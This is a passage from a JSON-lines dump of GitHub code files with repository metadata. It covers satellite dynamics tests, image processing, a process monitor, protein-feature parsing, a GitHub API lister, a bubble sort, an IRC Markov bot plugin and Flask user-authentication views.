constant)\nprint(\"Test in loop\")\nx_now = x0_eci\nx_hist = copy(x0_eci)\nx_hist.shape = [6, 1]\nfor t in range(0, 10000, 100):\n x_now = terrestrialDynamics(t, x_now, 0)\n x_hist = append(x_hist, x_now, axis=1)\n # print(norm(x_now[:3, 0]))\n\nfig, ax = plt.subplots()\nax.plot(norm(x_hist[:3, :], axis=0))\nax.set_ylabel(\"position magnitude\")\n# %%\nplt.show()\nprint(\"done\")\n", "repo_name": "dylan906/clockpunch", "sub_path": "tests/dynamics/test_dynamics.py", "file_name": "test_dynamics.py", "file_ext": "py", "file_size_in_byte": 2124, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "punchclock.common.constants.getConstants", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "punchclock.dynamics.dynamics.a2body", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 35, "usage_type": "call"}, {"api_name": "punchclock.dynamics.dynamics.satelliteDynamics", "line_number": 36, "usage_type": "call"}, {"api_name": "punchclock.dynamics.dynamics.terrestrialDynamics", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "punchclock.dynamics.dynamics.terrestrialDynamics", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "punchclock.common.transforms.ecef2eci", "line_number": 55, "usage_type": "call"}, {"api_name": "punchclock.dynamics.dynamics.terrestrialDynamics", "line_number": 56, "usage_type": "call"}, {"api_name": "punchclock.common.transforms.eci2ecef", "line_number": 57, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 67, "usage_type": "call"}, {"api_name": "punchclock.dynamics.dynamics.terrestrialDynamics", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "numpy.linalg.norm", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}]} +{"seq_id": "33813508657", "text": "# 2.1.1. 
Image Negatives\n\nimport cv2 as cv\n\n# reading img.tif\nimg = cv.imread(\"img.tif\")\n\n# inverting the image using bitwise_not\ninverted_img = cv.bitwise_not(img, mask=None)\n\n# displaying the image\ncv.imshow(\"Original Image\", img)\ncv.imshow(\"Inverted Image\", inverted_img)\ncv.waitKey(0)\n", "repo_name": "sladersh/Sensor-Technology-Lab", "sub_path": "lab2/qnA.py", "file_name": "qnA.py", "file_ext": "py", "file_size_in_byte": 289, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cv2.imread", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.bitwise_not", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "31042515449", "text": "# coding = utf-8\n\nimport psutil\nimport time\nimport os\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Process monitor and do something when target down.')\n parser.add_argument('-p', '--process_name', type=str, required=True, help='Process full name,eg:python.exe')\n parser.add_argument('-i', '--interval', type=int, default=10,\n help='Monitoring interval(minutes),default 10 minutes')\n parser.add_argument('-c', '--command', type=str, help='Execute command when target down, eg:\"shutdown 0\"')\n args = parser.parse_args()\n process_name = args.process_name\n interval = args.interval\n command = args.command\n\n while True:\n print('sleeping...')\n time.sleep(60 * interval)\n process_count = 0\n for proc in psutil.process_iter():\n try:\n pinfo = proc.as_dict(attrs=['pid', 'name'])\n if pinfo['name'] == process_name:\n process_count += 1\n except psutil.NoSuchProcess:\n pass\n\n if process_count > 0:\n print(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()), 'process still running...')\n else:\n s = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) + ' process down'\n f = open('process_monitor.log', 'a', encoding='utf-8')\n f.write(s)\n f.close()\n print(s)\n time.sleep(10)\n os.system(command)\n exit()\n", "repo_name": "hhuayuan/process-monitor", "sub_path": "process_monitor.py", "file_name": "process_monitor.py", "file_ext": "py", "file_size_in_byte": 1517, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 21, "usage_type": "call"}, {"api_name": "psutil.process_iter", "line_number": 23, "usage_type": "call"}, {"api_name": "psutil.NoSuchProcess", "line_number": 28, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 32, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 32, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 34, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 34, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "os.system", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "27852705443", "text": "\"\"\"\n@author: mguarin0\ndesc:\n\"\"\"\n\nimport os\nfrom timeit import default_timer as timer\nimport logging\nimport traceback\nimport numpy as np\nfrom utils import *\n\n__author__ = \"Michael Guarino\"\n__version__ = \"0.1\"\n__all__ = [\n 
\"protrusion_idx_hydrophobicity_main\"\n]\n\ndef _tbl_file_reader(path_to_tbl_file, complex_code):\n \"\"\"\n desc:\n args:\n returns:\n \"\"\"\n assert(os.path.isfile(path_to_tbl_file)), \"file does not exist\"\n start_idx_data = 7 # first 7 lines are all meta info\n with open(path_to_tbl_file, \"r\") as file:\n psaia_records = []\n for i, line in enumerate(file.readlines()[start_idx_data:]):\n if i == 0:\n headers = list(map(lambda x: x.replace(\" \", \"_\"), list(filter(None, map(str.strip, line.split(\"|\"))))))\n else:\n current_line = list(filter(None, map(str.strip, line.split(\" \"))))\n if len(headers)!=len(current_line):\n logging.error(\"|| complex_code: {} \"\n \"|| len(headers): {} \"\n \"|| len(current_line): {} \"\n \"|| line number: {}\".format(complex_code,\n len(headers),\n len(current_line),\n i+7))\n logging.error(\"|| complex_code: {} \"\n \"|| headers: {}\".format(complex_code,\n headers))\n logging.error(\"|| complex_code: {} \"\n \"|| current_line: {}\".format(complex_code,\n current_line))\n psaia_records.append(dict(zip(headers, current_line)))\n return psaia_records\n# end\n\ndef _create_final_format(psaia_output_records, complex_code):\n \"\"\"\n desc:\n args:\n returns:\n \"\"\"\n psaia = {}\n for i_res, res in enumerate(psaia_output_records):\n chain_id = \"{}_{}\".format(res[\"chain_id\"],\n complex_code)\n res_id = \"{}_{}_{}\".format(res[\"res_id\"],\n str(i_res),\n res[\"res_name\"])\n if (chain_id, res_id) in psaia.keys():\n logging.error(\"|| complex_code: {} \"\n \"|| dst_agl already contains key: {}\".format(complex_code,\n list(map(str, (chain_id, res_id)))))\n psaia[(chain_id, res_id)] = [res[\"average_CX\"], \n res[\"s_avg_CX\"],\n res[\"s-ch_avg_CX\"],\n res[\"s-ch_s_avg_CX\"],\n res[\"max_CX\"],\n res[\"min_CX\"],\n res[\"Hydrophobicity\"]]\n return psaia\n# end\n\ndef protrusion_idx_hydrophobicity_main(kwargs):\n \"\"\"\n desc:\n args:\n returns:\n \"\"\"\n\n start_time = timer()\n try:\n assert(all(k in [\"run_type\", \"tbl_filename\"]\n for k in kwargs.keys())), \"incorrect list of args\"\n \n assert(kwargs[\"run_type\"]==\"r_protrusion_idx\"), \"run type does not match argument passed\"\n assert(os.path.exists(kwargs[\"tbl_filename\"])), \"tbl filename does not exist\"\n \n filename, ext = kwargs[\"tbl_filename\"].split(\"/\")[-1].split(\".\")\n assert(ext==\"tbl\"), \"file extension must be .tbl\"\n complex_code = filename[:4]\n \n logging.info(\"|| complex_code: {} \"\n \"|| tbl_filename: {}\".format(complex_code,\n kwargs[\"tbl_filename\"]))\n \n psaia_output_records = _tbl_file_reader(path_to_tbl_file=kwargs[\"tbl_filename\"],\n complex_code=complex_code)\n final_format_protrusion_idxs = _create_final_format(psaia_output_records=psaia_output_records,\n complex_code=complex_code) \n \n paths = prjPaths(run_type=kwargs[\"run_type\"])\n to_pickle(obj_to_pickle=final_format_protrusion_idxs,\n path=os.path.join(paths.RUN_TYPE_OUT_DIR,\n \"r_protrusion_idx_{}.p\".format(complex_code)))\n end_time = timer()\n run_time = end_time-start_time\n logging.info(\"|| complex_code: {} \"\n \"|| protrusion_idx and hydrophobicity shape: ({}, {})\".format(complex_code,\n len(final_format_protrusion_idxs),\n len(final_format_protrusion_idxs[list(final_format_protrusion_idxs.keys())[0]])))\n logging.info(\"|| complex_code: {} \"\n \"|| run time (in seconds): {}\".format(complex_code,\n run_time))\n return_msg = {complex_code: run_time}\n except Exception as err:\n logging.error(\"|| filename: {} \"\n \"|| error thrown: {}\".format(kwargs[\"tbl_filename\"],\n
traceback.format_exc()))\n end_time = timer()\n run_time = end_time-start_time\n return_msg = {kwargs[\"tbl_filename\"]: run_time}\n pass\n finally:\n return return_msg\n# end\n", "repo_name": "mguarin0/test-transfer", "sub_path": "fout_preprocessing/src/psaiaFeatures.py", "file_name": "psaiaFeatures.py", "file_ext": "py", "file_size_in_byte": 5609, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.isfile", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 35, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 45, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 66, "usage_type": "call"}, {"api_name": "timeit.default_timer", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "timeit.default_timer", "line_number": 111, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 113, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 117, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 122, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 124, "usage_type": "call"}, {"api_name": "timeit.default_timer", "line_number": 125, "usage_type": "call"}]} +{"seq_id": "36869230298", "text": "import requests\n\n\nclass ListRepositories():\n API_BASE_URL = \"https://api.github.com\"\n\n def __init__(self, user):\n self._user = user\n\n def get_repos_by_user(self):\n response = requests.get(\n f\"{self.API_BASE_URL}/users/{self._user}/repos\")\n\n if response.status_code == 200:\n return {\n \"status_code\": 200,\n \"body\": response.json()\n }\n return {\n \"status_code\": response.status_code,\n \"body\": \"Error while getting repositories\"\n }\n\n def parse_response(self):\n response = self.get_repos_by_user()\n body = response[\"body\"]\n\n if response[\"status_code\"] == 200:\n for idx in range(len(body)):\n print(f\"{body[idx]['id']} - {body[idx]['name']} - {body[idx]['stargazers_count']}\")\n\n\nif __name__ == \"__main__\":\n respo = ListRepositories(\"thiagoneye\")\n respo.parse_response()\n", "repo_name": "thiagoneye/course-solid", "sub_path": "01. 
[S]ingle Responsibility Principle/problem.py", "file_name": "problem.py", "file_ext": "py", "file_size_in_byte": 947, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "30783468571", "text": "from sys import stdin, stdout\nfrom typing import List\n\n\ndef bubble_sort(arr_length, arr: List[int]) -> List[int]:\n \"\"\"Пузырьковая сортировка\"\"\"\n is_sorted = False\n n = 1\n while not is_sorted:\n is_sorted = True\n for i in range(arr_length - n):\n if arr[i] > arr[i + 1]:\n arr[i], arr[i + 1] = arr[i + 1], arr[i]\n is_sorted = False\n n += 1\n\n return arr\n\n\nif __name__ == '__main__':\n array_length = int(stdin.readline())\n array = [int(x) for x in stdin.readline().split()]\n for a in bubble_sort(array_length, array):\n stdout.write(str(a) + ' ')\n", "repo_name": "ZingyKizz/MADE", "sub_path": "algo/1/B.py", "file_name": "B.py", "file_ext": "py", "file_size_in_byte": 654, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 5, "usage_type": "name"}, {"api_name": "sys.stdin.readline", "line_number": 21, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 21, "usage_type": "name"}, {"api_name": "sys.stdin.readline", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 22, "usage_type": "name"}, {"api_name": "sys.stdout.write", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 24, "usage_type": "name"}]} +{"seq_id": "44070449131", "text": "# -*- coding: utf-8 -*-\n\nfrom stdPlugin import stdPlugin\nfrom lib.markov import Markov\n\n\nclass learn(stdPlugin):\n u'''Apprend continuellement les mots utilisés sur un canal, et génère des\n phrases aléatoires et stupides.\n '''\n\n events = {'pubmsg': {'exclusive': False, 'command_namespace': 'say'},\n 'privmsg': {'exclusive': False, 'command_namespace': 'say'},\n 'action': {'exclusive': False},\n 'join': {'exclusive': False},\n 'run': {'frequency': (300, 30000)},\n }\n markov = Markov()\n\n def __init__(self, bot, conf):\n return_val = super(learn, self).__init__(bot, conf)\n chans = self.bot.conf['chans'] if not self.bot.channels else \\\n self.bot.channels\n for chan in chans:\n self.get_dico(chan)\n return return_val\n\n def parse(self, chan, message):\n self.markov.add_sentence(chan, message)\n self.save_dico(chan)\n\n def on_pubmsg(self, serv, ev, helper):\n self.parse(helper['target'], helper['message'])\n return False\n\n def on_privmsg(self, serv, ev, helper):\n self.parse(helper['target'], helper['message'])\n return False\n\n def on_action(self, serv, ev, helper):\n self.parse(helper['target'], helper['message'])\n return False\n\n def on_join(self, serv, ev, helper):\n if helper['sender'] == serv.username: # si c’est notre propre join\n self.get_dico(helper['target'])\n return False\n else:\n return False\n\n def on_cmd(self, serv, ev, command, args, helper):\n u'''%(namespace)s sentence : génère une phrase aléatoire.\n %(namespace)s sentence : génère une phrase aléatoire contenant\n le mot donné, s’il est connu.\n %(namespace)s stats : indique le nombre de mots connus pour le canal\n courant'''\n if command == 'sentence':\n if len(args) == 0:\n serv.privmsg(helper['target'], self.markov.\n get_sentence(helper['target']))\n return True\n else:\n serv.privmsg(helper['target'], self.markov.\n 
get_sentence(helper['target'], args[0]))\n return True\n # elif command == 'save':\n # if self.save_dico(helper['target']):\n # serv.privmsg(helper['target'], u'Dictionnaire sauvegardé : '\n # '%d mots' % self.get_stats(helper['target']))\n # return True\n # else:\n # serv.privmsg(helper['target'], u'Erreur lors de la '\n # 'sauvegarde du dictionnaire !')\n # return True\n elif command == 'stats':\n serv.privmsg(helper['target'], u'Mot connus : %d' % self.markov.\n get_stats(helper['target']))\n return True\n else:\n serv.privmsg(helper['target'], u'Je ne connais pas cette '\n 'commande.')\n return True\n\n def get_dico(self, chan):\n data = self.bot.get_config(self, chan, self.markov.default_data())\n self.markov.load(chan, data)\n\n def save_dico(self, chan):\n data = self.markov.dump(chan)\n return self.bot.write_config(self, chan, data)\n\n def on_run(self, serv, helper):\n serv.privmsg(helper['target'], self.markov.\n get_sentence(helper['target']))\n", "repo_name": "vegaelle/naobot", "sub_path": "plugins/learn.py", "file_name": "learn.py", "file_ext": "py", "file_size_in_byte": 3503, "program_lang": "python", "lang": "fr", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "stdPlugin.stdPlugin", "line_number": 7, "usage_type": "name"}, {"api_name": "lib.markov.Markov", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "19933700586", "text": "from flask import (Blueprint, current_app, flash, redirect, render_template,\n request, session, url_for)\nfrom flask.views import MethodView\nfrom werkzeug.datastructures import MultiDict\n\nfrom src.extensions import db\nfrom src.mailers.send_mail import send_mail_for_aprove\nfrom src.user.auth import SessionAuth\nfrom src.user.decorators import login_required\nfrom src.user.forms import (ChangeAvatarForm, LoginForm, ProfileForm,\n ProfileOAuthForm, RegistrationForm,\n ResendEmailForm)\nfrom src.user.models import User\nfrom src.views import BaseView\n\nbp = Blueprint('auth', __name__, template_folder='templates')\n\n\nclass Registration(MethodView):\n\n def __init__(self, template_name):\n self.template: str = template_name\n self.form = RegistrationForm\n self.context = {'oauth_backend': current_app.config['OAUTH_BACKEND']}\n\n def post(self):\n self.context['form'] = form = self.form(request.form) # noqa: WPS204\n\n if not form.validate():\n return render_template(self.template, **self.context) # noqa: WPS204\n\n login = request.form.get('login')\n email = request.form.get('email')\n password = request.form.get('password')\n firstname = request.form.get('firstname')\n middlename = request.form.get('middlename')\n lastname = request.form.get('lastname')\n image = request.form.get('email')\n pass_hash = User.hash_password(password)\n user = User(\n login=login,\n email=email,\n password=pass_hash.decode(),\n firstname=firstname,\n middlename=middlename,\n lastname=lastname,\n image=image,\n gravatar='gravatar',\n )\n if User.query.filter_by(login=login).first():\n flash('Логин уже занят.', 'error')\n return render_template(\n self.template,\n **self.context,\n )\n if User.query.filter_by(email=email).first():\n flash('Такой e-mail уже привязан к другому аккаунту.', 'error')\n return render_template(\n self.template,\n **self.context,\n )\n User.save(user)\n if send_mail_for_aprove(user):\n flash('Вам на почту отправлена ссылка для подтверждения регистрации', 'info')\n else:\n flash('Сбой отправки письма', 'error')\n return redirect(url_for('auth.login'))\n\n def get(self):\n self.context['form'] = 
self.form()\n return render_template(self.template, **self.context)\n\n\nclass Login(MethodView):\n def __init__(self, template_name):\n self.template = template_name\n self.form = LoginForm\n self.context = {'oauth_backend': current_app.config['OAUTH_BACKEND']}\n\n def get(self):\n self.context['form'] = self.form()\n return render_template(self.template, **self.context)\n\n def post(self):\n self.context['form'] = form = self.form(request.form)\n\n if not form.validate():\n return render_template(self.template, **self.context)\n\n login = request.form['login']\n password = request.form['password']\n\n user = User.query.filter_by(\n login=login,\n ).first()\n\n if user and User.check_password(user, password):\n if not user.is_aproved:\n flash('Завершите регистрацию, пройдя по ссылке, отправленной на почту', 'error')\n return redirect(url_for('auth.login'))\n session['auth'] = SessionAuth(True, user)\n if request.referrer and 'answer' in request.referrer:\n return redirect(request.referrer)\n return redirect(url_for('index.home'))\n flash('Неверный логин или пароль!', 'error')\n return render_template(self.template, **self.context)\n\n\nclass Profile(BaseView):\n def __init__(self, template_name):\n super().__init__(template_name)\n self.user = session['auth'].user\n self.form = ProfileForm\n\n def get(self):\n if self.user.is_oauth:\n return redirect(url_for('auth.profile_oauth'))\n user_data = MultiDict([\n ('email', self.user.email),\n ('firstname', self.user.firstname),\n ('middlename', self.user.middlename),\n ('lastname', self.user.lastname),\n ])\n self.context['form'] = self.form(user_data)\n return render_template(self.template_name, **self.context)\n\n def post(self):\n self.context['form'] = form = self.form(request.form)\n if not form.validate():\n return render_template(self.template, **self.context)\n User.query.filter_by(login=session['auth'].user.login).update({\n 'email': request.form.get('email'),\n 'firstname': request.form.get('firstname'),\n 'middlename': request.form.get('middlename'),\n 'lastname': request.form.get('lastname'),\n })\n return redirect(url_for('auth.profile'))\n\n\nclass ProfileOAuth(BaseView):\n \"\"\"Профиль участников, у кого подключён OAuth.\"\"\"\n\n def __init__(self, template_name):\n super().__init__(template_name)\n self.form = ProfileOAuthForm\n self.user = session['auth'].user\n\n def post(self):\n self.context['form'] = form = self.form(request.form)\n if not form.validate():\n return render_template(self.template_name, **self.context)\n login = request.form.get('login')\n email = request.form.get('email')\n firstname = request.form.get('firstname')\n middlename = request.form.get('middlename')\n lastname = request.form.get('lastname')\n user_data = {\n 'login': login,\n 'email': email,\n 'firstname': firstname,\n 'middlename': middlename,\n 'lastname': lastname,\n 'image': email,\n }\n # отдельно смотрим пароль:\n # если стоит флаг, то меняем\n # если пароль пустой, то сбрасываем\n if request.form.get('change_password'):\n password = request.form.get('password') if request.form.get('password') else False\n pass_hash = User.hash_password(password).decode() if password else ''\n user_data['password'] = pass_hash\n\n if login != self.user.login:\n if User.query.filter_by(login=login).first():\n flash('Логин уже занят.', 'error')\n return render_template(\n self.template_name,\n **self.context,\n )\n\n if email != self.user.email:\n if User.query.filter_by(email=email).first():\n flash('Такой e-mail уже привязан к другому аккаунту.', 
'error')\n return render_template(\n self.template_name,\n **self.context,\n )\n\n User.query.filter_by(github_id=self.user.github_id).update(user_data)\n return redirect(url_for('.profile_oauth'))\n\n def get(self):\n if self.user.is_oauth:\n user_data = MultiDict([\n ('login', self.user.login),\n ('email', self.user.email),\n ('change_password', False),\n ('firstname', self.user.firstname),\n ('middlename', self.user.middlename),\n ('lastname', self.user.lastname),\n ])\n self.context['form'] = self.form(user_data)\n return render_template(self.template_name, **self.context)\n\n return redirect(url_for('index.home'))\n\n\nclass Logout(MethodView):\n def get(self):\n auth = session.get('auth')\n auth.logout()\n return redirect(url_for('index.home'))\n\n\nclass EmailAprove(MethodView):\n \"\"\"Функция проверки ссылки.\n\n по ней переходит пользователь, завершая регистрацию\n \"\"\"\n\n def get(self, token):\n user = User.verify_token_for_mail_aproved(token)\n if not user:\n return redirect(url_for('index.home'))\n return redirect(url_for('auth.login'))\n\n\nclass EmailResend(MethodView):\n \"\"\"Resend email function.\"\"\"\n\n def __init__(self, template_name):\n self.template: str = template_name\n self.form = ResendEmailForm\n\n def post(self):\n form = self.form(request.form)\n if not form.validate():\n return render_template(self.template, **{'form': form})\n email = request.form.get('email')\n\n user = User.query.filter_by(email=email).first()\n if user:\n if send_mail_for_aprove(user):\n flash('Вам на почту отправлена ссылка для подтверждения регистрации', 'info')\n else:\n flash('Сбой отправки письма', 'error')\n else:\n flash('Пользователь с таким email не зарегистрирован', 'error')\n return redirect(url_for('auth.login'))\n\n def get(self):\n return render_template(self.template, **{'form': self.form()})\n\n\nclass ChangeAvatar(BaseView):\n def __init__(self, template_name):\n super().__init__(template_name)\n self.user = session['auth'].user\n self.form = ChangeAvatarForm\n\n def get(self):\n if self.user.gravatar:\n avatar_type = 'gravatar'\n else:\n avatar_type = 'face'\n\n user_data = MultiDict([\n ('chosen_avatar', avatar_type),\n ('avatar_img_str', self.user.image),\n ])\n self.context['form'] = self.form(user_data)\n return render_template(self.template_name, **self.context)\n\n def post(self):\n # выбор типа аватарки - граватар или рожица\n avatar_type = request.form.get('chosen_avatar')\n new_img = self.user.image\n if request.form.get('avatar_img_str'):\n new_img = request.form.get('avatar_img_str')\n\n # если аватар по умолчанию -\n # подтягивается граватар по email пользователя\n if request.form.get('default_avatar'):\n avatar_type = 'gravatar'\n new_img = self.user.email\n User.query.filter_by(login=session['auth'].user.login).update({\n 'image': new_img,\n 'gravatar': avatar_type,\n })\n db.session.commit()\n\n return redirect(url_for('auth.change_avatar'))\n\n\nbp.add_url_rule(\n '/logout/',\n view_func=login_required(Logout.as_view(\n name='logout',\n )),\n)\n\nbp.add_url_rule(\n '/registration/',\n view_func=Registration.as_view(\n name='registration',\n template_name='user/register_form.jinja2',\n ),\n)\n\nbp.add_url_rule(\n '/login/',\n view_func=Login.as_view(\n name='login',\n template_name='user/login.jinja2',\n ),\n)\n\nbp.add_url_rule(\n '/profile/',\n view_func=login_required(Profile.as_view(\n name='profile',\n template_name='user/profile_form.jinja2',\n )),\n)\n\nbp.add_url_rule(\n '/profile_oauth/',\n view_func=login_required(ProfileOAuth.as_view(\n 
name='profile_oauth',\n template_name='user/profile_oauth_form.jinja2',\n )),\n)\n\nbp.add_url_rule(\n '/email_aprove/',\n view_func=EmailAprove.as_view(\n name='email_aprove',\n ),\n)\n\nbp.add_url_rule(\n '/resend_email/',\n view_func=EmailResend.as_view(\n name='resend_email',\n template_name='user/resend_email_form.jinja2',\n ),\n)\n\nbp.add_url_rule(\n '/change_avatar/',\n view_func=ChangeAvatar.as_view(\n name='change_avatar',\n template_name='user/change_avatar.jinja2',\n ),\n)\n", "repo_name": "honeydev/junior", "sub_path": "src/user/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 12122, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Blueprint", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.views.MethodView", "line_number": 19, "usage_type": "name"}, {"api_name": "src.user.forms.RegistrationForm", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.current_app.config", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.current_app", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 32, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 32, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 33, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 33, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 35, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 35, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 36, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 36, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 37, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 37, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 38, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 38, "usage_type": "name"}, {"api_name": "src.user.models.User.hash_password", "line_number": 39, "usage_type": "call"}, {"api_name": "src.user.models.User", "line_number": 39, "usage_type": "name"}, {"api_name": "src.user.models.User", "line_number": 40, "usage_type": "call"}, {"api_name": "src.user.models.User.query.filter_by", "line_number": 50, "usage_type": "call"}, {"api_name": "src.user.models.User.query", "line_number": 50, "usage_type": "attribute"}, {"api_name": "src.user.models.User", "line_number": 50, "usage_type": "name"}, 
{"api_name": "flask.flash", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 52, "usage_type": "call"}, {"api_name": "src.user.models.User.query.filter_by", "line_number": 56, "usage_type": "call"}, {"api_name": "src.user.models.User.query", "line_number": 56, "usage_type": "attribute"}, {"api_name": "src.user.models.User", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 58, "usage_type": "call"}, {"api_name": "src.user.models.User.save", "line_number": 62, "usage_type": "call"}, {"api_name": "src.user.models.User", "line_number": 62, "usage_type": "name"}, {"api_name": "src.mailers.send_mail.send_mail_for_aprove", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 64, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.views.MethodView", "line_number": 74, "usage_type": "name"}, {"api_name": "src.user.forms.LoginForm", "line_number": 77, "usage_type": "name"}, {"api_name": "flask.current_app.config", "line_number": 78, "usage_type": "attribute"}, {"api_name": "flask.current_app", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 85, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 85, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 90, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 90, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 91, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 91, "usage_type": "name"}, {"api_name": "src.user.models.User.query.filter_by", "line_number": 93, "usage_type": "call"}, {"api_name": "src.user.models.User.query", "line_number": 93, "usage_type": "attribute"}, {"api_name": "src.user.models.User", "line_number": 93, "usage_type": "name"}, {"api_name": "src.user.models.User.check_password", "line_number": 97, "usage_type": "call"}, {"api_name": "src.user.models.User", "line_number": 97, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 99, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 101, "usage_type": "name"}, {"api_name": "src.user.auth.SessionAuth", "line_number": 101, "usage_type": "call"}, {"api_name": "flask.request.referrer", "line_number": 102, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 102, "usage_type": "name"}, {"api_name": 